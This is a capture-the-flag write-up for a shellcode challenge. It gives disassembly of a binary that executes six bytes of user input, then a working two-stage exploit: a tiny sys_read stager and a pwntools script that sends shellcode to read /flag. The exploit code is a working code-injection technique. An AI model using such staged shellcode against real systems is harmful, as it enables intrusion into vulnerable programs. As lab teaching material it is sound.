│           0x000015c1      488d3dfd0b..   lea rdi, [0x000021c5]       ; "###" ; const char *s
│           0x000015c8      e863fbffff     call sym.imp.puts           ; int puts(const char *s)
│           0x000015cd      bf0a000000     mov edi, 0xa                ; int c
│           0x000015d2      e849fbffff     call sym.imp.putchar        ; int putchar(int c)
│           0x000015d7      488d3d020c..   lea rdi, str.This_challenge_reads_in_some_bytes__modifies_them__depending_on_the_specific_challenge_configuration___and_executes_them ; 0x21e0 ; "This challenge reads in some bytes, modifies them (depending on the specific challenge configuration), and executes them" ; const char *s
│           0x000015de      e84dfbffff     call sym.imp.puts           ; int puts(const char *s)
│           0x000015e3      488d3d760c..   lea rdi, str.as_code__This_is_a_common_exploitation_scenario__called__code_injection_._Through_this_series_of_challenges__you_will ; 0x2260 ; "as code! This is a common exploitation scenario, called `code injection`. Through this series of challenges, you will" ; const char *s
│           0x000015ea      e841fbffff     call sym.imp.puts           ; int puts(const char *s)
│           0x000015ef      488d3de20c..   lea rdi, str.practice_your_shellcode_writing_skills_under_various_constraints__To_ensure_that_you_are_shellcoding__rather_than_doing ; 0x22d8 ; "practice your shellcode writing skills under various constraints! To ensure that you are shellcoding, rather than doing" ; const char *s
│           0x000015f6      e835fbffff     call sym.imp.puts           ; int puts(const char *s)
│           0x000015fb      488d3d4e0d..   lea rdi, str.other_tricks__this_will_sanitize_all_environment_variables_and_arguments_and_close_all_file_descriptors___2._n ; 0x2350 ; "other tricks, this will sanitize all environment variables and arguments and close all file descriptors > 2.\n" ; const char *s
│           0x00001602      e829fbffff     call sym.imp.puts           ; int puts(const char *s)
│           0x00001607      c745ec0300..   mov dword [fildes], 3
│       ┌─< 0x0000160e      eb0e           jmp 0x161e
│       │   ; CODE XREF from main @ 0x1625(x)
│      ┌──> 0x00001610      8b45ec         mov eax, dword [fildes]
│      ╎│   0x00001613      89c7           mov edi, eax                ; int fildes
│      ╎│   0x00001615      e886fbffff     call sym.imp.close          ; int close(int fildes)
│      ╎│   0x0000161a      8345ec01       add dword [fildes], 1
│      ╎│   ; CODE XREF from main @ 0x160e(x)
│      ╎└─> 0x0000161e      817dec0f27..   cmp dword [fildes], 0x270f  ; '\x0f\''
│      └──< 0x00001625      7ee9           jle 0x1610
│           0x00001627      488b45d0       mov rax, qword [var_30h]
│           0x0000162b      488945f0       mov qword [s], rax
│       ┌─< 0x0000162f      eb2b           jmp 0x165c
│       │   ; CODE XREF from main @ 0x1666(x)
│      ┌──> 0x00001631      488b45f0       mov rax, qword [s]
│      ╎│   0x00001635      488b00         mov rax, qword [rax]
│      ╎│   0x00001638      4889c7         mov rdi, rax                ; const char *s
│      ╎│   0x0000163b      e810fbffff     call sym.imp.strlen         ; size_t strlen(const char *s)
│      ╎│   0x00001640      4889c2         mov rdx, rax                ; size_t n
│      ╎│   0x00001643      488b45f0       mov rax, qword [s]
│      ╎│   0x00001647      488b00         mov rax, qword [rax]
│      ╎│   0x0000164a      be00000000     mov esi, 0                  ; int c
│      ╎│   0x0000164f      4889c7         mov rdi, rax                ; void *s
│      ╎│   0x00001652      e839fbffff     call sym.imp.memset         ; void *memset(void *s, int c, size_t n)
│      ╎│   0x00001657      488345f008     add qword [s], 8
│      ╎│   ; CODE XREF from main @ 0x162f(x)
│      ╎└─> 0x0000165c      488b45f0       mov rax, qword [s]
│      ╎    0x00001660      488b00         mov rax, qword [rax]
│      ╎    0x00001663      4885c0         test rax, rax
│      └──< 0x00001666      75c9           jne 0x1631
│           0x00001668      488b45c8       mov rax, qword [var_38h]
│           0x0000166c      488945f8       mov qword [var_8h], rax
│       ┌─< 0x00001670      eb2b           jmp 0x169d
│       │   ; CODE XREF from main @ 0x16a7(x)
│      ┌──> 0x00001672      488b45f8       mov rax, qword [var_8h]
│      ╎│   0x00001676      488b00         mov rax, qword [rax]
│      ╎│   0x00001679      4889c7         mov rdi, rax                ; const char *s
│      ╎│   0x0000167c      e8cffaffff     call sym.imp.strlen         ; size_t strlen(const char *s)
│      ╎│   0x00001681      4889c2         mov rdx, rax                ; size_t n
│      ╎│   0x00001684      488b45f8       mov rax, qword [var_8h]
│      ╎│   0x00001688      488b00         mov rax, qword [rax]
│      ╎│   0x0000168b      be00000000     mov esi, 0                  ; int c
│      ╎│   0x00001690      4889c7         mov rdi, rax                ; void *s
│      ╎│   0x00001693      e8f8faffff     call sym.imp.memset         ; void *memset(void *s, int c, size_t n)
│      ╎│   0x00001698      488345f808     add qword [var_8h], 8
│      ╎│   ; CODE XREF from main @ 0x1670(x)
│      ╎└─> 0x0000169d      488b45f8       mov rax, qword [var_8h]
│      ╎    0x000016a1      488b00         mov rax, qword [rax]
│      ╎    0x000016a4      4885c0         test rax, rax
│      └──< 0x000016a7      75c9           jne 0x1672
│           0x000016a9      41b900000000   mov r9d, 0                  ; size_t offset
│           0x000016af      41b800000000   mov r8d, 0                  ; int fd
│           0x000016b5      b922000000     mov ecx, 0x22               ; '\"' ; int flags
│           0x000016ba      ba07000000     mov edx, 7                  ; int prot
│           0x000016bf      be00100000     mov esi, sym._init          ; 0x1000 ; size_t length
│           0x000016c4      bf0000f019     mov edi, 0x19f00000         ; void*addr
│           0x000016c9      e892faffff     call sym.imp.mmap           ; void*mmap(void*addr, size_t length, int prot, int flags, int fd, size_t offset)
│           0x000016ce      4889056329..   mov qword [obj.shellcode], rax ; [0x4038:8]=0
│           0x000016d5      488b055c29..   mov rax, qword [obj.shellcode] ; [0x4038:8]=0
│           0x000016dc      483d0000f019   cmp rax, 0x19f00000
│       ┌─< 0x000016e2      741f           je 0x1703
│       │   0x000016e4      488d0dde0d..   lea rcx, obj.__PRETTY_FUNCTION__.25265 ; 0x24c9 ; "main" ; const char *function
│       │   0x000016eb      ba62000000     mov edx, 0x62               ; 'b' ; unsigned int line
│       │   0x000016f0      488d35c90c..   lea rsi, str._challenge_babyshell_level_14.c ; 0x23c0 ; "/challenge/babyshell-level-14.c" ; const char *file
│       │   0x000016f7      488d3de20c..   lea rdi, str.shellcode___void__0x19f00000 ; str.shellcode___void__0x19f00000
│       │                                                              ; 0x23e0 ; "shellcode == (void *)0x19f00000" ; const char *assertion
│       │   0x000016fe      e87dfaffff     call sym.imp.__assert_fail  ; void __assert_fail(const char *assertion, const char *file, unsigned int line, const char *function)
│       │   ; CODE XREF from main @ 0x16e2(x)
│       └─> 0x00001703      488b052e29..   mov rax, qword [obj.shellcode] ; [0x4038:8]=0
│           0x0000170a      4889c6         mov rsi, rax
│           0x0000170d      488d3dec0c..   lea rdi, str.Mapped_0x1000_bytes_for_shellcode_at__p__n ; str.Mapped_0x1000_bytes_for_shellcode_at__p__n
│                                                                      ; 0x2400 ; "Mapped 0x1000 bytes for shellcode at %p!\n" ; const char *format
│           0x00001714      b800000000     mov eax, 0
│           0x00001719      e852faffff     call sym.imp.printf         ; int printf(const char *format)
│           0x0000171e      488d3d0b0d..   lea rdi, str.Reading_0x6_bytes_from_stdin._n ; str.Reading_0x6_bytes_from_stdin._n
│                                                                      ; 0x2430 ; "Reading 0x6 bytes from stdin.\n" ; const char *s
│           0x00001725      e806faffff     call sym.imp.puts           ; int puts(const char *s)
│           0x0000172a      488b050729..   mov rax, qword [obj.shellcode] ; [0x4038:8]=0
│           0x00001731      ba06000000     mov edx, 6                  ; size_t nbyte
│           0x00001736      4889c6         mov rsi, rax                ; void *buf
│           0x00001739      bf00000000     mov edi, 0                  ; int fildes
│           0x0000173e      e86dfaffff     call sym.imp.read           ; ssize_t read(int fildes, void *buf, size_t nbyte)
│           0x00001743      488905e628..   mov qword [obj.shellcode_size], rax ; [0x4030:8]=0
│           0x0000174a      488b05df28..   mov rax, qword [obj.shellcode_size] ; [0x4030:8]=0
│           0x00001751      4885c0         test rax, rax
│       ┌─< 0x00001754      751f           jne 0x1775
│       │   0x00001756      488d0d6c0d..   lea rcx, obj.__PRETTY_FUNCTION__.25265 ; 0x24c9 ; "main" ; const char *function
│       │   0x0000175d      ba67000000     mov edx, 0x67               ; 'g' ; unsigned int line
│       │   0x00001762      488d35570c..   lea rsi, str._challenge_babyshell_level_14.c ; 0x23c0 ; "/challenge/babyshell-level-14.c" ; const char *file
│       │   0x00001769      488d3ddf0c..   lea rdi, str.shellcode_size___0 ; 0x244f ; "shellcode_size > 0" ; const char *assertion
│       │   0x00001770      e80bfaffff     call sym.imp.__assert_fail  ; void __assert_fail(const char *assertion, const char *file, unsigned int line, const char *function)
│       │   ; CODE XREF from main @ 0x1754(x)
│       └─> 0x00001775      488d3dec0c..   lea rdi, str.This_challenge_is_about_to_execute_the_following_shellcode:_n ; 0x2468 ; "This challenge is about to execute the following shellcode:\n" ; const char *s
│           0x0000177c      e8aff9ffff     call sym.imp.puts           ; int puts(const char *s)
│           0x00001781      488b15a828..   mov rdx, qword [obj.shellcode_size] ; [0x4030:8]=0
│           0x00001788      488b05a928..   mov rax, qword [obj.shellcode] ; [0x4038:8]=0
│           0x0000178f      4889d6         mov rsi, rdx                ; int64_t arg2
│           0x00001792      4889c7         mov rdi, rax                ; int64_t arg1
│           0x00001795      e84ffbffff     call sym.print_disassembly
│           0x0000179a      488d3d040d..   lea rdi, [0x000024a5]       ; const char *s
│           0x000017a1      e88af9ffff     call sym.imp.puts           ; int puts(const char *s)
│           0x000017a6      488d3df90c..   lea rdi, str.Executing_shellcode__n ; 0x24a6 ; "Executing shellcode!\n" ; const char *s
│           0x000017ad      e87ef9ffff     call sym.imp.puts           ; int puts(const char *s)
│           0x000017b2      488b057f28..   mov rax, qword [obj.shellcode] ; [0x4038:8]=0
│           0x000017b9      4889c2         mov rdx, rax
│           0x000017bc      b800000000     mov eax, 0
│           0x000017c1      ffd2           call rdx
│           0x000017c3      488d3df20c..   lea rdi, str._Goodbye_      ; 0x24bc ; "### Goodbye!" ; const char *s
│           0x000017ca      e861f9ffff     call sym.imp.puts           ; int puts(const char *s)
│           0x000017cf      b800000000     mov eax, 0
│           0x000017d4      c9             leave
└           0x000017d5      c3             ret

Solution: Two-stage shellcode

Stage 1 (6 bytes) 用 sys_read 把 Stage 2 读到可执行内存中：

.intel_syntax noprefix
    push rax   /* rax 进入 shellcode 时是 0，入栈 */
    pop rdi    /* rdi = 0 (stdin 的 fd) */
    push rdx   /* rdx 存着当前 shellcode 的内存基址 0x19f00000 */
    pop rsi    /* rsi = 0x19f00000 (我们要把新代码读到这块可执行内存里) */
    syscall    /* 触发系统调用 因为 rax 是 0，执行 sys_read */

#!/usr/bin/env python3
import itertools
from pwn import *
import os

context.update(arch="amd64", os="linux")
context.log_level = "error"

target_binary = "/challenge/micro-menace"

stage ="""
.intel_syntax noprefix
    push rax
    pop rdi
    push rdx
    pop rsi
    syscall
"""

payload = asm(stage)

p = process(target_binary)
p.send(payload)

time.sleep(0.1)

# sys_read 从 0x19f00000 这个起始地址开始写入 Stage 2 数据, add 6 nop to cover the stage 1 data
stage2 = asm("nop;" * 6 + shellcraft.cat("/flag"))
p.send(stage2)

p.interactive()